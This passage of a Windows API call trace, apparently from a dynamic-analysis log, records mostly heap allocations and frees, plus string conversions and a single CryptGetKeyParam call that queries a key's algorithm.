(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbdad) returned 0x452db80 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0114.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.703] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0114.703] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0114.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0114.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0114.704] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0114.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0114.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0114.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0114.705] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.705] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0114.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.706] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0114.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0114.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0114.707] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0114.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0114.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0114.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0114.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0114.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0114.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0114.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0114.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0114.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0114.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0114.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0114.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0114.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0114.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0114.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e28 [0114.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0114.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0114.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0114.763] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0114.763] RtlAllocateHeap 